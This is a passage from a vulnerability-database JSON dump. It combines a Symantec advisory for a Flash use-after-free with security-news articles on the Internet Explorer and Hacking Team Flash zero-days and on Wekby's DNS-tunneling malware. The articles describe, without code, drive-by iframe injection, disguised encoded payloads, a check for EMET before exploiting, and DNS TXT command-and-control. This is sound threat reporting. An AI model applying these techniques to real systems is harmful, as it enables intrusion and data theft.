15.0.0.189 \n * Adobe Flash Player 15.0.0.223 \n * Adobe Flash Player 15.0.0.239 \n * Adobe Flash Player 15.0.0.242 \n * Adobe Flash Player 15.0.0.246 \n * Adobe Flash Player 16.0.0.234 \n * Adobe Flash Player 16.0.0.235 \n * Adobe Flash Player 16.0.0.257 \n * Adobe Flash Player 16.0.0.287 \n * Adobe Flash Player 16.0.0.291 \n * Adobe Flash Player 16.0.0.296 \n * Adobe Flash Player 16.0.0.305 \n * Adobe Flash Player 17.0.0.134 \n * Adobe Flash Player 17.0.0.169 \n * Adobe Flash Player 17.0.0.188 \n * Adobe Flash Player 18.0.0.143 \n * Adobe Flash Player 18.0.0.160 \n * Adobe Flash Player 18.0.0.161 \n * Adobe Flash Player 18.0.0.194 \n * Adobe Flash Player 2 \n * Adobe Flash Player 3 \n * Adobe Flash Player 4 \n * Adobe Flash Player 6.0.21.0 \n * Adobe Flash Player 6.0.79 \n * Adobe Flash Player 7 \n * Adobe Flash Player 7.0.1 \n * Adobe Flash Player 7.0.14.0 \n * Adobe Flash Player 7.0.19.0 \n * Adobe Flash Player 7.0.24.0 \n * Adobe Flash Player 7.0.25 \n * Adobe Flash Player 7.0.53.0 \n * Adobe Flash Player 7.0.60.0 \n * Adobe Flash Player 7.0.61.0 \n * Adobe Flash Player 7.0.63 \n * Adobe Flash Player 7.0.66.0 \n * Adobe Flash Player 7.0.67.0 \n * Adobe Flash Player 7.0.68.0 \n * Adobe Flash Player 7.0.69.0 \n * Adobe Flash Player 7.0.70.0 \n * Adobe Flash Player 7.0.73.0 \n * Adobe Flash Player 7.1 \n * Adobe Flash Player 7.1.1 \n * Adobe Flash Player 7.2 \n * Adobe Flash Player 8 \n * Adobe Flash Player 8.0.22.0 \n * Adobe Flash Player 8.0.24.0 \n * Adobe Flash Player 8.0.33.0 \n * Adobe Flash Player 8.0.34.0 \n * Adobe Flash Player 8.0.35.0 \n * Adobe Flash Player 8.0.39.0 \n * Adobe Flash Player 8.0.42.0 \n * Adobe Flash Player 9 \n * Adobe Flash Player 9.0.112.0 \n * Adobe Flash Player 9.0.114.0 \n * Adobe Flash Player 9.0.115.0 \n * Adobe Flash Player 9.0.124.0 \n * Adobe Flash Player 9.0.125.0 \n * Adobe Flash Player 9.0.151 .0 \n * Adobe Flash Player 9.0.152 .0 \n * Adobe Flash Player 9.0.155.0 \n * Adobe Flash Player 9.0.159.0 \n * Adobe Flash Player 9.0.16 \n * Adobe Flash Player 9.0.18D60 \n * Adobe Flash Player 9.0.20 \n * Adobe Flash Player 9.0.20.0 \n * Adobe Flash Player 9.0.246 0 \n * Adobe Flash Player 9.0.246.0 \n * Adobe Flash Player 9.0.260.0 \n * Adobe Flash Player 9.0.262 \n * Adobe Flash Player 9.0.262.0 \n * Adobe Flash Player 9.0.277.0 \n * Adobe Flash Player 9.0.28.0 \n * Adobe Flash Player 9.0.280 \n * Adobe Flash Player 9.0.283.0 \n * Adobe Flash Player 9.0.289.0 \n * Adobe Flash Player 9.0.31.0 \n * Adobe Flash Player 9.0.45.0 \n * Adobe Flash Player 9.0.47.0 \n * Adobe Flash Player 9.0.48.0 \n * Adobe Flash Player 9.0.8.0 \n * Adobe Flash Player 9.0.9.0 \n * Adobe Flash Player 9.125.0 \n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Redhat Enterprise Linux Desktop Supplementary 6 \n * Redhat Enterprise Linux Server Supplementary 6 \n * Redhat Enterprise Linux Server Supplementary EUS 6.6.z \n * Redhat Enterprise Linux Workstation Supplementary 6 \n * Redhat RHEL Desktop Supplementary Client 5 \n * Redhat RHEL Supplementary Server 5 \n * SuSE openSUSE Evergreen 11.4 \n\n### Recommendations\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from a successful exploit. \n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo limit exposure to these and other latent vulnerabilities, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of attacks, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources.\n\n**Implement multiple redundant layers of security.** \nAs an added precaution, deploy memory-protection schemes (such as nonexecutable stack/heap configuration and randomly mapped memory segments). This may complicate exploits of memory-corruption vulnerabilities.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run applications with the minimal amount of privileges required for functionality. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2015-07-07T00:00:00", "published": "2015-07-07T00:00:00", "id": "SMNTC-75568", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/75568", "type": "symantec", "title": "Adobe Flash Player ActionScript 3 ByteArray Use After Free Remote Memory Corruption Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-01-27T10:06:42", "bulletinFamily": "info", "description": "[](<https://3.bp.blogspot.com/-HZPlRLNYe7I/Uv8S80E-6pI/AAAAAAAAaIM/yZu0sGsFUzs/s1600/Internet-Explorer-Windows-zero-day-exploit.jpg>)Hackers are using a zero day vulnerability in Microsoft's [Internet Explorer](<https://thehackernews.com/search/label/Internet%20Explorer>) (IE) web browser and targeting US military personnels in an active attack campaign, dubbed as '_Operation Snowman'_.\n\n \n\n\nFireEye Researchers have [discovered](<https://www.fireeye.com/blog/uncategorized/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html>) that a U.S. veterans website was compromised to serve a [zero day](<https://thehackernews.com/search/label/zero%20day>) exploit, known as _CVE-2014-0322_, which typically involves the compromise of a specific website in order to target a group of visitors known to frequent it.\n\n \n\n\nFireEye identified drive-by-download attack which has altered HTML code of the website and introduced JavaScript which creates malicious iFrame.\n\n \n\n\n\u201c_A zero-day exploit (CVE-2014-0322) being served up from the U.S. Veterans of Foreign Wars\u2019 website (VFW[.]org). We believe the attack is a strategic Web compromise targeting American military personnel, amid a paralyzing snowstorm at the U.S._\u201d\n\n \n\n\nAccording to FireEye, the zero day CVE-2014-0322 '_vulnerability is a previously unknown use-after-free bug in Microsoft Internet Explorer 10. The vulnerability allows the attacker to modify one byte of memory at an arbitrary address._'\n\n \n\n\nDropped files are digitally signed making it look like a legitimate application and the [vulnerability](<https://thehackernews.com/search/label/Vulnerability>) ultimately allowed them to bypass address space layout randomization (ASLR) by accessing the memory from Flash ActionScript. \n\n \n\n\nBut the exploitation can be migrated if the user is browsing with a different version of IE or has installed Microsoft\u2019s Experience Mitigation Toolkit (EMET).\n\n \n\n\n\"_Based on the overlaps and trade craft similarities, it is believed that the actors behind the campaigns are associated with two previously identified campaigns, Operation Deputy Dog and Operation Ephermeral Hydra, which had previously targeted a number of different industries,_\" FireEye said.\n\n \n\n\nA Microsoft spokesperson confirmed - \u201c_Our initial investigation has revealed that Internet Explorer 9 and Internet Explorer 10 are affected_\".\n", "modified": "2014-02-15T07:18:49", "published": "2014-02-14T20:18:00", "id": "THN:94A6EEF7B58D5DE9CCE68307A6FA2B6F", "href": "https://thehackernews.com/2014/02/cve-2014-0322-internet-explorer-zero.html", "type": "thn", "title": "CVE-2014-0322: Internet Explorer zero-day exploit targets US Military Intelligence", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:19", "bulletinFamily": "info", "description": "[](<https://3.bp.blogspot.com/-qllvndzYpes/VZ5mlZ4rLxI/AAAAAAAAjeU/W_yymRKV2Ns/s1600/Hacking-Team-Flash-Zero-Day.jpg>)\n\nThe corporate data leaked in the [recent cyber attack](<https://thehackernews.com/2015/07/Italian-hacking-team-software.html>) on the infamous surveillance software firm [Hacking Team](<https://thehackernews.com/2014/02/hacking-team-sold-spyware-to-21.html>) has revealed that the **_Adobe Flash zero-day _**(CVE-2015-5119) exploit has already been added to several exploit kits.\n\n \n\n\nSecurity researchers at Trend Micro have discovered evidences of the **_Adobe Flash zero-day (CVE-2015-5119) exploit_** being used in a number of exploit kits before the vulnerability was publicly revealed in this week's data breach on the spyware company.\n\n \n\n\nThe successful exploitation of the zero-day Flash vulnerability could cause a system crash, potentially allowing an attacker to take full control of the affected system.\n\n \n\n\n### Adobe Flash Zero-Day Targeted Japan and Korea\n\n \n\n\nAccording to the researchers, the zero-day exploit, about which the rest of the world got access on Monday, was apparently used in limited cyber attacks on **South Korea **and** Japan**.\n\n> _\"In late June, [Trend Micro] learned that a user in Korea was the attempted target of various exploits, including a Flash vulnerability (CVE-2014-0497) discovered last year,\" _Weimin Wu, threat analyst at Trend Micro [wrote](<http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-flash-zero-day-tied-to-attacks-in-korea-and-japan-on-july-1/>). \n \n_\"Traffic logs indicate the user may have received spear-phishing emails with attached documents\u2026contained a URL for the user to visit. This URL led to a site hosted in the United States, which [included] a Flash exploit, detected as SWF_EXPLOYT.YYKI. This particular exploit targets the zero-day Adobe vulnerability that was disclosed during the [Hacking Team leak](<https://thehackernews.com/2015/07/flash-zero-day-vulnerability.html>).\"_\n\nThe zero-day exploit downloads a Trojan on the target victim's computer, which further downloads several other malicious payloads on the infected system.\n\n \n\n\nResearchers say the zero-day exploit code they came across was very similar to the exploit code revealed as part of the [Hacking Team data breach](<https://thehackernews.com/2015/07/flash-zero-day-vulnerability.html>). This simply means the attack was conducted by someone with the access to the tools and services offered by Hacking Team.\n\n \n\n\nHowever, Adobe has [released a patch](<https://helpx.adobe.com/security/products/flash-player/apsb15-16.html>) to address this Adobe Flash zero-day (CVE-2015-5119) vulnerability, thereby advising users to install the update as soon as possible.\n", "modified": "2015-07-09T12:20:50", "published": "2015-07-09T01:20:00", "id": "THN:F6B79957FA6EFD8F9C60F4A8646CCE04", "href": "https://thehackernews.com/2015/07/Hacking-Team-Flash-Zero-Day.html", "type": "thn", "title": "Hacking Team Flash Zero-Day Linked to Cyber Attacks on South Korea and Japan", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:18", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-PU0YupNvZZA/VaIFHQRy0zI/AAAAAAAAjgo/0gofhn0tdLM/s1600/flash-player-exploit.jpg>)\n\nAnother Flash zero-day exploit has emerged from the [hundreds of gigabytes of data recently leaked ](<https://thehackernews.com/2015/07/Italian-hacking-team-software.html>)from **Hacking Team**, an Italian surveillance software company that is long been accused of selling spying software to governments and intelligence agencies.\n\n \n\n\nThe critical zero-day vulnerability in Adobe Flash is a **Use-After-Free() programming flaw** ([CVE-2015-5122](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5122>)) which is similar to the [CVE-2015-5119 Flash vulnerability patched](<https://thehackernews.com/2015/07/flash-zero-day-vulnerability.html>) last week and allows an attacker to hijack vulnerable computers.\n\n \n\n\nAdobe says the cyber criminals are apparently already exploiting this vulnerability for which no patch exists yet. However, it's second time in a single week when the company is working on a fix for the zero-day vulnerability in its Flash Player software.\n\n \n\n\n### Flash Zero-Day Flaw in the Wild\n\n \n\n\nThe Exploit code for this flaw is already available online, allowing an attacker to remotely execute malicious code on victims' computers and install malware, Adobe said in an [advisory](<https://helpx.adobe.com/security/products/flash-player/apsa15-04.html>) published late Friday.\n\n> \"Successful exploitation [of CVE-2015-5122 flaw] could cause a crash and potentially allow an attacker to take control of the affected system,\" Adobe said.\n\nThe zero-day vulnerability is present in the **_latest Adobe Flash Player version 18.0.0.204 and earlier versions for Windows, Linux and OS X_**.\n\n \n\n\nAdobe credited FireEye researcher** Dhanesh Kizhakkinan **for reporting the vulnerability documented in stolen data leaked from [Hacking Team](<https://thehackernews.com/2014/02/hacking-team-sold-spyware-to-21.html>).\n\n \n\n\nTherefore, once again we advise everyone with Flash installed to remove or disable the software until the company patches the critical security bug.\n", "modified": "2015-07-12T07:34:08", "published": "2015-07-11T20:34:00", "id": "THN:81AF218D527E626B7FE15454B68E5FF0", "href": "https://thehackernews.com/2015/07/hacking-flash-player-exploit.html", "type": "thn", "title": "Second Flash Player Zero-day Exploit found in 'Hacking Team' Dump", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T22:56:36", "bulletinFamily": "info", "description": "Handlers for three major exploit kits have managed to utilize in short order a [zero-day vulnerability in Adobe Flash Player](<https://helpx.adobe.com/security/products/flash-player/apsa15-03.html>) uncovered among the 400 Gb of data stolen from Hacking Team.\n\nExperts, including French researcher [Kafeine](<http://malware.dontneedcoffee.com/2015/07/hackingteam-flash-0d-cve-2015-xxxx-and.html>) and a number of others from security companies, revealed last night that the Angler, Neutrino, and Nuclear kits had incorporated exploits for the zero day, which [Adobe has patched](<https://helpx.adobe.com/security/products/flash-player/apsb15-16.html>).\n\nThe [Hacking Team breach](<https://threatpost.com/hackers-release-hacking-team-internal-documents-after-breach/113612>) was disclosed on Sunday and by Monday afternoon, word of the Flash zero day, along with an unpatched Windows kernel vulnerability, was circulating. Though the Hacking Team data included only a proof of concept that opened the computer\u2019s calculator, an extensive read-me document that accompanied it likely helped pave the way to the exploits.\n\n> Flash 0day from [#HackingTeam](<https://twitter.com/hashtag/HackingTeam?src=hash>) with a nice readme. Works very well on Chrome etc. <http://t.co/nfqck54YhT> [pic.twitter.com/8uAQuUIXGV](<http://t.co/8uAQuUIXGV>)\n> \n> \u2014 webDEViL (@w3bd3vil) [July 6, 2015](<https://twitter.com/w3bd3vil/status/618168863708962816>)\n\nA [Metasploit module](<https://github.com/rapid7/metasploit-framework/commit/2cdaace42f8f121e97f36f37fe1b3835dbeaef0a>) was also developed and integrated into the framework, before integration into the exploit kits, Kafeine told Threatpost via email.\n\nAdobe issued an advisory late Tuesday afternoon that it would today release an updated Flash Player. The vulnerability, CVE-2015-5119, affects Flash Player version 18.0.0.194 and earlier for Windows, Macintosh and Linux systems.\n\nSecurity company Bromium, meanwhile, published an [analysis](<http://labs.bromium.com/2015/07/07/adobe-flash-zero-day-vulnerability-exposed-to-public/>) of the vulnerability, which is a byte array use-after-free memory issue that allows an attacker to gain control of a Windows machine running the vulnerable Flash Player. Researcher Nick Cano wrote that Hacking Team built its proof-of-concept code based on a 2014 vulnerability known as the ActionScript-Spray attack (CVE-2014-0322) which took advantage of a UAF bug in Internet Explorer to gain access to the heap of a process.\n\n\u201cHackingTeam\u2019s exploit uses this idea to achieve execution, but uses a UAF bug internal to the ActionScript 3 engine,\u201d Cano wrote. The Bromium analysis provides in-depth detail on the vulnerability and how the Hacking Team PoC exploits it.\n\nCano said the Hacking Team exploits comes with shellcode for 32- and 64-bit Windows machines, as well as Mac OS X 64-bit machines, and mitigation bypasses for Microsoft\u2019s free EMET tool. .\n\n\u201cWe\u2019ve tested this exploit with the latest updated Flash Player 18 and Internet Explorer which indicates that this is clearly a zero day risk to internet users today,\u201d Cano wrote. \u201cThis exploit has the potential to completely own almost any system that it hits, and can be reliably blocked by leveraging robust isolation technologies.\u201d\n\nResearchers from China\u2019s 360Vulcan Team, who cashed in big at this year\u2019s Pwn2Own contest, also published an [analysis](<https://translate.google.com/translate?depth=1&hl=en&ie=UTF8&prev=_t&rurl=translate.google.com&sl=auto&tl=en&u=http://blogs.360.cn/blog/hacking-team-flash-0day/>) of the vulnerability (translated).\n\nHacking Team is a controversial player in security, selling intrusion software flagged by the Wassenaar Arrangement used to monitor users\u2019 computers. It, along with others such as Gamma Corp., has been criticized for selling software that violates not only privacy but human rights; the companies are accused of selling their products to oppressive governments. Among the Hacking Team data were invoices showing sales to the Sudan, Ethiopia and other sanctioned nations, drawing the[ ire of the European Parliament](<https://threatpost.com/eu-lawmaker-wants-answers-on-hacking-team-sales-to-sanctioned-countries/113638>), which yesterday asked some pointed questions about the incident.\n", "modified": "2015-07-09T13:52:36", "published": "2015-07-08T11:19:02", "id": "THREATPOST:342B067585A04A2E2EA010EA2C33DC1B", "href": "https://threatpost.com/hacking-team-flash-zero-day-weaponized-in-exploit-kits/113663/", "type": "threatpost", "title": "Hacking Team Flash Zero Day Weaponized in Exploit Kits", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:17", "bulletinFamily": "info", "description": "Palo Alto Networks is reporting a shift in malware tactics used by the APT group Wekby that has added a rare but effective new tool to its bag of tricks. The security [firm reported on Tuesday](<http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/>) that over the past week, Wekby attackers are turning to the technique known as DNS tunneling in lieu of more conventional HTTP delivery of command and controls for remote access control of infected computer networks.\n\nResearchers discovered the change in strategy while monitoring an undisclosed U.S.-based high-tech firm targeted by the gang. Palo Alto Networks call the DNS tunneling malware pisloader, adding it has existed for some time but is seldom used. The use of the DNS-based attacks differs from the Wekby\u2019s go-to malware HTTPBrowser, which is still used widely by the group, according to Ryan Olson, researcher at Palo Alto Networks Unit 42 team.\n\n\u201cWe found it really interesting that this pisloader malware technique not only was being used to exfiltration data but also as a command and control mechanism,\u201d Olson told Threatpost. The malware is uncommon because of its limited use case for attacks and that it requires above average technical sophistication by the perpetrator to configure. Domains used in the Wekby attack outlined by Palo Alto Networks include globalprint-us[.]com, ns1.logitech-usa[.]com and intranetwabcam[.]com.\n\nDNS tunneling takes advantage of the TXT transport layer within the DNS protocol used by top and second level domain name system servers. A maximum of 255 bytes of data can be transported via DNS request between endpoint and a DNS server using the TXT layer. For Wekby attackers that have already gained a foothold on targeted systems, the DNS tunneling of commands and DNS tunneling used to remove of data is extremely slow, but well suited for long term APT campaigns.\n\nIn the case of pisloader, attackers would use their own DNS server that they controlled to send and receive C2 commands to infected computers. Embedded in the DNS TXT layer of the call and responses between infected client and Wekby\u2019s DNS server would be a mix of five instructions including; collect victim system information, list drives on victim machine, list file information for provided directory, upload a file to the victim machine, and spawn a command shell.\n\nTo obfuscate those commands, Wekby attackers use base32 encoding on the DNS TXT layer making it appear that the DNS TXT was simply garbage strings of DNS metadata.\n\nFor attackers, DNS tunneling is a double-edged sword, Olson said. \u201cPisloader is extremely hard to discover if you\u2019re not already looking for it. But with a limit of 255 bytes per message uploading anything could take days to weeks without sounding alarms,\u201d he said. But because pisloader was able to skirt many security products that don\u2019t inspect DNS traffic properly, attackers are willing to sacrifice speed for stealth, Olson said. For those reasons the use of pisloader is extremely rare, even among Wekby gangs. In fact, the use of DNS as a C2 protocol has never been widely adopted by APT gangs. Olson said, there are very few malware families with similar DNS tunneling attributes such a [FrameworkPOS](<https://blog.gdatasoftware.com/2014/10/23942-new-frameworkpos-variant-exfiltrates-data-via-dns-requests>), [C3PRO-RACCOON](<https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf>) and [FeederBot](<http://blog.cj2s.de/archives/28-Feederbot-a-bot-using-DNS-as-carrier-for-its-CC.html>).\n\nPalo Alto Networks said it was able to link the pisloader malware to Wekby because it shared many similar characteristics found within the HTTPBrowser RAT family \u2013 commonly used by Wekby. Palo Alto Networks said the Wekby APT group remains active, targeting many U.S.-based healthcare, telecommunications, aerospace, defense, and high-tech companies.\n\n\u201cThe group is known to leverage recently released exploits very shortly after those exploits are available, such as in the case of HackingTeam\u2019s Flash zero-day exploit,\u201d [according to Palo Alto Networks report on the pisloader](<http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/>). Palo Alto Networks has said that Wekby has often leveraged [the zero-day Adobe Flash Exploit](<https://threatpost.com/hacking-team-flash-zero-day-weaponized-in-exploit-kits/113663/>) (CVE-2015-5119) via spear phishing campaigns. That said, Olson told Threatpost researchers couldn\u2019t be sure of the exploit used to gain a foothold in the high-tech firm targeted by Wekby attackers.\n", "modified": "2016-05-25T20:41:40", "published": "2016-05-25T14:58:52", "id": "THREATPOST:944377914FB1A58CB3F9F096F78260E0", "href": "https://threatpost.com/wekby-apt-gang-using-dns-tunneling-for-command-and-control/118303/", "type": "threatpost", "title": "Wekby APT Gang Seen Using DNS Tunneling for Command and Control", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:21", "bulletinFamily": "info", "description": "Attackers were able to compromise the U.S. Veterans of Foreign Wars\u2019 website this week and serve up a previously unknown zero day exploit in Internet Explorer 10, and while motivation behind the campaign is still unclear, experts are speculating its aim was to procure military intelligence.\n\nAccording to [researchers at FireEye](<http://www.fireeye.com/blog/uncategorized/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html>), the campaign, dubbed Operation SnowMan, follows in the footsteps of operations DeputyDog and Ephemeral Hydra, two campaigns that recently used IE zero days to carry out watering hole attacks, dropping remote access Trojans to takeover machines.\n\nWhile a number of retired military personnel use the site, VFW.org, active military personnel also frequent it, potentially putting sensitive military information at risk.\n\nFireEye noticed the \u201cclassic drive-by download\u201d style attack on Tuesday after discovering that an iframe had been appended to the beginning of the website\u2019s HTML code. The iframe contains a corrupted Flash object that goes on to trigger the IE 10 vulnerability, (CVE-2014-0322), a use-after-free bug in the browser.\n\nFrom there the Flash file downloads a XOR-encoded payload from a remote server, decodes it and executes it.\n\nAccording to FireEye it starts off as a .JPG image, then the .JPG is attached to the shellcode which is executed to produce two files, sqlrenew.txt and stream.exe, before its executed with a Windows API call.\n\nLike DeputyDog, SnowMan deploys an HTTPS version of Gh0stRAT, a remote access Trojan that has been spotted connecting to some of the same IP addresses as DeputyDog. SnowMan can let the attacker modify one byte of memory at an arbitrary address, meaning it can also bypass ASLR, or Address Space Layout Randomization, along with DEP, Data Execution Prevention, both security features in Windows.\n\nA quintet of researchers \u2013 Darien Kindlund, Dan Caselden, Xiabo Chen, Ned Moran and Mike Scott \u2013 described the campaign on FireEye\u2019s blog yesterday, acknowledging that the time frame of the attack, \u201camid a paralyzing snowstorm at the U.S. Capitol in the days leading up to the Presidents Day holiday weekend,\u201d could have helped the attackers.\n\nWinter storm Pax forced much of the U.S. Capitol to shutter Thursday and Monday of course is a U.S. holiday, President\u2019s Day, a time lapse that could give the attackers the window they need.\n\nWhile the attack is targeted, Jerome Segura, a researcher with [MalwareBytes](<http://blog.malwarebytes.org/exploits-2/2014/02/new-internet-explorer-10-zero-day-used-in-targeted-attacks/>), was able to reproduce the zero-day on Windows 7 on Internet Explorer 10 with the latest version of Flash Player today, showing how easy it may be for an attacker to replicate.\n\nUsers running IE 11 or using Microsoft\u2019s Experience Mitigation Toolkit (EMET) are not at risk because the iframe will abort exploitation under those conditions. The attacker can easily diagnose whether the machine is running EMET by loading an XML string. If the parsed return code fails, it means EMET is not present and the attacker can proceed with the exploit.\n\nAccording to FireEye the threat has several connections to the DeputyDog and Ephemeral Hydra campaigns. All of them use a zero-day to deliver a RAT and use a 0x95-encoded payload \u2013 obfuscated by a .JPG extension \u2013 among other traits.\n\nAdditonally there are a handful of infrastructure overlaps and connections between SnowMan, EphemeralHydra and DeputyDog, including similar domains and IPs. The code found in the Flash file and the way the shellcode is executed share similarities with the attacks as well, suggesting they may be intertwined.\n\nResearchers at security firm Websense had also been looking into the zero day and published information about it shortly after FireEye on Thursday.\n\nWhile Websense agrees with FireEye that the attack appears to have correlations with DeputyDog and EphemeralHydra, Websense claims it first saw it being used in exploits as far back as Jan. 20, about three weeks before FireEye noticed it.\n\nWebsense researchers Alex Watson and Victor Chin write that the attack could also be targeting the Groupement des Industries Francaises Aeronautiques et Spatiales (GIFAS) a French aerospace association.\n\nAccording to the two, the exploit was at one point hosted and distributed via a (U.S.-based) site masquerading as GIFAS\u2019 site, suggesting the French group, or those visiting its website may be a target in addition to those visiting the VFW website.\n\nIt\u2019s a small difference but Websense\u2019s analysis also notes that a malicious Shockwave file, not a Flash file, downloads the .JPG payload that leads to the attack.\n\nCounting the US military this week, FireEye points out the threat actors have targeted a swathe of industries with the attacks including but not limited to: law firms, NGOs, mining companies, Japanese firms and IT companies.\n\nFireEye discovered the [DeputyDog attack](<http://threatpost.com/microsoft-warns-of-new-ie-zero-day/102327>), which also targeted Internet Explorer (both 8 and 9) and delivered a payload via an image file, back in September. That attack targeted Japanese media and government outlets via a watering hole attack, dropping a McRAT variant onto compromised computers.\n\n[Ephemeral Hydra](<http://threatpost.com/ie-zero-day-watering-hole-attack-injects-malicious-payload-into-memory/102891>), which came to light in November and and dropped a McRAT variant, this time on a U.S.-based non-governmental organization in order to secure \u201cindustry-specific intelligence.\u201d\n\nMicrosoft has not yet issued an [official security advisory](<http://technet.microsoft.com/en-us/security/dn530791>) about the vulnerability but it likely will soon, in addition to potentially releasing a workaround for IE 10 users. The company has announced it will not release an out-of-band patch for the vulnerability. Microsoft\u2019s next scheduled Patch Tuesday update is March 11.\n\nMicrosoft acknowledged the vulnerability on Friday and until the update, encouraged users to update to IE 11.\n\n\u201cMicrosoft is aware of limited, targeted attacks against Internet Explorer 10,\u201d a Microsoft spokesperson said, \u201cOur initial investigation has revealed that Internet Explorer 9 and Internet Explorer 10 are affected. We will take the necessary steps to protect customers; meanwhile, we recommend customers upgrade to Internet Explorer 11 for added protection.\u201d\n\nThe news comes just a few days after the Microsoft released [February\u2019s Patch Tuesday](<http://threatpost.com/microsoft-adds-critical-ie-patches-under-the-wire/104214>) update, including the last minute MS14-010 bulletin which addressed 24 vulnerabilities in the browser.\n", "modified": "2014-02-19T19:31:47", "published": "2014-02-14T14:27:27", "id": "THREATPOST:EBDCB2D4445A9B7E6AD0B43B5AE5928B", "href": "https://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272/", "type": "threatpost", "title": "New IE Zero Day Found Targeting Military Intelligence", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:14", "bulletinFamily": "info", "description": "Attackers have increased their exploitation of an Internet Explorer zero day vulnerability (CVE-2014-0322) [set to be fixed](<http://threatpost.com/microsoft-ie-zero-day-patch-among-november-patch-tuesday-updates/102898>) by Microsoft in its regularly scheduled patch Tuesday release later this afternoon.\n\nAccording to a Websense [report](<http://community.websense.com/blogs/securitylabs/archive/2014/03/10/cyber-criminals-expand-use-of-cve20140322-before-patch-tuesday.aspx>), the exploit source code deployed in at least two incidents \u2013 [one targeting a French aerospace manufacturer and another targeting the website of Veterans of Foreign Wars](<http://threatpost.com/second-group-seen-using-ie-10-zero-day/104344>) \u2013 appears to have been made public. This publication and the subsequent addition of the zero-day to popular crimeware kits seems to have spurred the uptick, at least in part. As Websense notes, once exploit code like this goes public, generating attacks using it is essentially as easy as \u201ccopy and paste.\u201d\n\nAnother factor contributing to the IE zero day vulnerability\u2019s increased exploitation is likely the sheer amount of press it received, especially after researchers announced they would demonstrate [a total bypass of Microsoft\u2019s Enhanced Mitigation Experience Toolkit (EMET)](<http://threatpost.com/researchers-develop-complete-microsoft-emet-bypass/104437>) at CanSecWest in Vancouver this week. This EMET bypass is both relevant and significant because the Redmond, Wash., computer giant urged its customers to [install and run EMET as a temporary mitigation against this very same zero-day](<http://threatpost.com/microsoft-ships-fix-it-for-ie-10-zero-day/104383>).\n\nIn addition to the two websites listed above, Websense reports that three others have been targeted using the same bug: hatobus[dot]co[dot]jp, a Japanese travel site hosted in Tokyo; english[dot]com[dot]tw, the site of a Taiwanese English school hosted in San Antonio, Texas; and chemistry[dot]hku[dot]hk, a Hong Kong University Chemistry Department website hosted in Hong Kong.\n\nIt all began with a typo-squatted variety of giffo[dot]asso[dot]fr, the website of the French aerospace company. The attackers set up giffo[dot]assso[dot]net and hosted a malicious iframe there that led to another part of the same domain where the exploit was actually located.\n\nOnce this attack began garnering media attention, other criminals began copying it, deploying the same code on different lure sites with different payloads.\n\nIn the case of Hatobus, the popular Japanese travel site, attackers buried the redirecting iframe in some javascript files on the site. The exploit too was hosted on the site, which makes it all the more inconspicuous since shady redirects are a generally a dead giveaway for protective software. The exploit code in this case, according to Websense, was nearly identical to that used in the first attack. The only real difference is that the attackers piggybacked a second, Java exploit, which aimed to install a banking trojan targeting members of a popular Japanese bank. Unlike earlier, targeted attacks, the Hatobus variety sought to infect as many machines as possible.\n\nBoth other attacks were essentially copycats as well. Interestingly, in the case of the Taiwanese English school, the exploit was rather flagrantly hosted on the homepage of that website. The Hong Kong University Chemistry Department attack deployed redirecting iframes similar to those in the other incidents.\n\n\u201cIt\u2019s evident that the repercussions of exploit code of an unpatched vulnerability that found its way to the public domain can have quite an impact; exploit code that has been crafted for a targeted attack is virtually later on copied and used to drop crimeware binaries,\u201d wrote Websense\u2019s Elad Sharf. \u201cWe could see that the exploit code for CVE-2014-0322 was encompassed and served in a variety of ways as it \u201cevolved\u201d in scale: starting from being utilized on a cybersquatted lure website used in a low-volume and selected \u201cunder the radar\u201d targeted attacks to being served through hidden iframes and exploit code that was directly placed on compromised websites with the ultimate aim to impact as many browsing users as possible with crimeware.\u201d\n", "modified": "2014-03-11T18:30:05", "published": "2014-03-11T14:30:05", "id": "THREATPOST:A72A91268C8C0871DE1E44E25B215AAF", "href": "https://threatpost.com/hackers-milk-ie-zero-day-before-patch/104713/", "type": "threatpost", "title": 